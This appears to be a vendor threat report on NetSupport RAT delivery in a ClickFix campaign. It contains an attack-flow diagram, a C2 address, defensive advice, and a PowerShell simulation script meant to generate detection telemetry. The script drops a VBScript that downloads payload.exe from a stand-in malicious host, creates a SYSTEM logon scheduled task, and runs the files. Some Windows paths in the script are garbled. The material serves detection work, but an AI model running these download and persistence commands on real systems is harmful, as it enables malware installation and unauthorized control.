NetSupport RAT Delivered by an Unidentified Loader

SOC Prime Team

NetSupport RAT Delivered by an Unidentified Loader

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

A previously unidentified remote access tool was observed delivering a malicious NetSupport Manager RAT package. The initial malware communicated with a command-and-control server at 89.110.110.119 over TCP port 443 using encoded traffic. The campaign, tracked as SmartApeSG ClickFix, relied on malicious scripts and a CAB archive to install the NetSupport RAT on victim systems.

Investigation

The investigation uncovered multiple indicators, including malicious URLs, IP addresses, and files written to the ProgramData directory. The initial RAT delivered a batch script that extracted and installed the NetSupport RAT from a setup.cab archive. Once installation was complete, the supporting files were removed to reduce visible traces of the activity.

Mitigation

Organizations should block network traffic to the identified malicious IP addresses and domains and monitor for creation of the referenced files under ProgramData. Endpoint defenses should detect execution of suspicious VBScript and batch files, while network monitoring should apply stricter controls to encoded traffic over port 443.

Response

Defenders should alert on the listed indicators, isolate affected systems, and conduct forensic analysis to uncover any persistence mechanisms. Malicious files should be removed, any unauthorized changes should be reversed, and firewall policies should be updated to block outbound communication with the identified command-and-control infrastructure.

"graph TB %% Class Definitions classDef action fill:#c2f0c2 %% Light green for action nodes %% Node definitions node_a["Action – T1204.001 User Execution: Malicious Link Description: Victim loads malicious JavaScript from a compromised page."] class node_a action node_b["Action – T1027.006 Obfuscated Files: HTML Smuggling Description: Delivery of encoded script using HTML smuggling technique."] class node_b action node_c["Action – T1059.005 Command and Scripting Interpreter: Visual Basic Description: processor.vbs drops token.bat to the system."] class node_c action node_d["Action – Execution of Batch script Outcome: Extracts NetSupport RAT onto the host."] class node_d action node_e["Action – T1547.014 Active Setup & T1546.007 Netsh Helper DLL Description: RAT placed in C:\ProgramData\UpdateInstaller to achieve persistence."] class node_e action node_f["Action – T1574.007 Path Interception & T1574.005 Installer Permissions Weakness Description: Privilege escalation via malicious PATH entry and weak installer permissions."] class node_f action node_g["Action – T1564 Hide Artifacts & T1564.010 Process Argument Spoofing Description: Staging files are deleted and process arguments are spoofed to evade defenses."] class node_g action node_h["Action – T1571 Non-Standard Port & T1071.001 Web Protocols Description: Command and control traffic over TCP 443 using encoded web protocol communications."] class node_h action %% Connections showing flow node_a –>|leads_to| node_b node_b –>|leads_to| node_c node_c –>|leads_to| node_d node_d –>|leads_to| node_e node_e –>|leads_to| node_f node_f –>|leads_to| node_g node_g –>|leads_to| node_h "

Attack Flow

Attack Narrative & Commands:
An attacker who has gained initial foothold on a Windows host drops three malicious artifacts into C:ProgramData:
1. processor.vbs – a Visual Basic script that downloads the main RAT binary.
2. token.bat – a batch file that creates a scheduled task for persistence.
3. setup.cab – a CAB archive that contains a DLL dropped into C:ProgramData and later loaded via rundll32.exe.
The attacker then executes each file in turn, causing process‑creation events that contain the exact file paths required by the Sigma rule.

Regression Test Script:

# netSupport_RAT_simulation.ps1
# -------------------------------------------------
# PURPOSE: Reproduce NetSupport RAT infection telemetry
# -------------------------------------------------

$targetDir = "C:ProgramData"
# Ensure the directory exists
if (-Not (Test-Path $targetDir)) { New-Item -ItemType Directory -Path $targetDir -Force }

# 1. Drop processor.vbs
$vbsPath = Join-Path $targetDir "processor.vbs"
Set-Content -Path $vbsPath -Value @"
Set objXML = CreateObject("MSXML2.XMLHTTP")
objXML.open "GET","http://malicious.example.com/payload.exe",False
objXML.send
"@" 

# 2. Drop token.bat
$batPath = Join-Path $targetDir "token.bat"
Set-Content -Path $batPath -Value @"
schtasks /create /tn "NetSupportPersist" /tr "$targetDirsetup.cab" /sc onlogon /ru System
"@

# 3. Drop setup.cab (dummy CAB containing a text file)
$cabPath = Join-Path $targetDir "setup.cab"
$tempDir = "$env:TEMPcab_temp"
New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
Set-Content -Path "$tempDirdummy.txt" -Value "placeholder"
# Create a CAB – requires makecab (built‑in Windows tool)
& makecab.exe "$tempDirdummy.txt" $cabPath

# Execution phase – trigger the detections
Write-Host "`n[+] Executing processor.vbs"
cscript.exe //B //Nologo $vbsPath

Write-Host "[+] Executing token.bat"
cmd.exe /c $batPath

Write-Host "[+] Executing setup.cab via rundll32 (simulated load)"
rundll32.exe "$cabPath",DummyEntryPoint

# Cleanup temporary folder used for CAB creation
Remove-Item -Recurse -Force $tempDir

Cleanup Commands:

# netSupport_RAT_cleanup.ps1
$targetDir = "C:ProgramData"
$files = @("processor.vbs","token.bat","setup.cab")
foreach ($f in $files) {
    $fullPath = Join-Path $targetDir $f
    if (Test-Path $fullPath) { Remove-Item -Force $fullPath }
}
# Remove the scheduled task created by token.bat
schtasks /delete /tn "NetSupportPersist" /f
Write-Host "Cleanup complete."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free